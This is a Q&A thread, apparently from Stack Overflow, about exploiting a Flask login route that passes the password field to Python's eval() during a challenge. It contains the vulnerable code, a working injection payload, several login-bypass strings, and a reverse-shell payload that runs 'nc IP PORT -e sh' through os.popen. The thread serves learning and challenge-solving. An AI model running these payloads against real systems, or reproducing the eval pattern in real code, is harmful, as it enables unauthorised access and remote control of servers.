# How to escape this python eval() function?

Tags: python, security, eval, reverse-shell, bypass

So, as part of a challenge I found the following piece of code on a template of an opensource site:

```
@app.route("/admin", methods=['GET', 'POST'])
def admin():
    username = getUsernameFromSecureStorage() or "admin"
    passwd = getPasswordFromSecureStorage()
    if session.get('loggedin', False):
        return render_template('admin_page.html')
    else:
        if request.method == 'POST':
            if eval("'" + request.form['pass'] + "' == passwd"):
                session['loggedin'] = True
                return redirect(request.headers['referer'], code=302)
            else:
                return render_template('admin.html', msg="Login failed")
        return render_template('admin.html', msg="Welcome to the admin page")
```

I know for a fact that there is a python command injection here, as I was able to execute a sleep function using the following payload in the password field:

```
'+eval(compile('for x in range(1):\n import time\n time.sleep(20)','a','single'))+'
```

But in case of trying to bypass the login or getting a reverse shell, there has been no luck yet.

Grateful for any suggestions.

Comment: Maybe just `' or True or '` to make the condition always truthy.

Answer (score 1):

Thank you so much for the help with bypassing the password field by using

```
' or True or '
```

Another way is:

```
1==1'or'2
```

Main thing is that the statement had to evaluate to always being True.

As for the reverse shell, was pretty easy, especially when I found out that there's no bash on the server
So this is what was needed:

```
'+__import__("os").popen("nc IP PORT -e sh").read()+'
```

Thank you all for the help!

Answer (score -2):

Maybe take a look [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#python). It's a pretty neat cheat sheet for Reverse Shells, and there are plenty of python examples.

I'm sure you can find anything in there!

**EDIT**:

I dont have a working reverse shell yet, but bypassing login should be possible with `"' == '' or '"` as password.

example.py:

```
passwd = "aa"
evil_code = "' == '' or '"
if eval("'" + evil_code + "' == passwd"):
    print("success")
else:
    print("no success")
```

Comment: Unfortunately link-only answers are discouraged on Stack Overflow.

Comment: I'm currently working on some example code

Comment: While this link may answer the question, it is better to include the essential parts of the answer here and provide the link for reference.  Link-only answers can become invalid if the linked page changes. - [From Review](/review/low-quality-posts/32988644)

Comment: @DonaldDuck Im still relatively new to this site, sorry. I improved my answer with some example code.

Answer (score -3):

Normaly quit function is quiting your app so quit function might be helpfull.

You can try:

```
quit()
```